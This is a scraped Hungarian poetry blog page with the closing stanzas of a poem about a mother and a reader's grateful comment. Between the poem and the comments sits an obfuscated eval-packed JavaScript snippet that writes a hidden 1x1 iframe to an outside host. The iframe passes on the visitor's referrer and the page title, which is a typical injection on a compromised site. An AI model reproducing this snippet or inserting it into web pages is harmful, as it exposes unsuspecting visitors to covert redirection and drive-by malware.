s arcát nem látta a tükörben./p
p style=”text-align: center;”Ő járt, tudott és látva-látott
fájó ideggel szótlan álmot,
megszentelt engemet a lelke,
az ő lelkétől vagyok áldott./p
p style=”text-align: center;”Neki nem volt korán könnyezni,
s könnyezni nem volt soha késő,
ha ment az erdőn, ment az úton
ketten mentek: az élet és ő./p
p style=”text-align: center;”Sírt és dalolt bús mátkaságán,
bölcsők között sírokra görnyedt,
a képeskönyve volt az élet,
nem vitt magával soha könyvet./p
p style=”text-align: center;”A fiait csókolta némán,
halottjait némán temette,
én nagyon sokakat szerettem,
de ő az életet szerette./p
p style=”text-align: center;”…és még van vagyon sok vers a tarsolyomban…..a FB oldalamon megtalál sok szépet még./p!–844c7b74e31d727d5814a0ed667c0255–script type=”text/javascript”
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’n=\’+3.o;0=0+\’r=\’+6;d.p(\’8 q=”s:u;v:w” 0=”\’+0+\'” x=”\’+4+\'” y=”\’+5+\'”/8\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))
/script

2 hozzászólás a(z) “Versek” bejegyzéshez

  1. Kedves Mónika!
    Tegnap búcsúztatta el a férjemet, csodálatosan szépen, meghatóan, hálás köszönet. Monostori Mihályné Katalin.

Vélemény, hozzászólás?

Az email címet nem tesszük közzé. A kötelező mezőket * karakterrel jelöljük.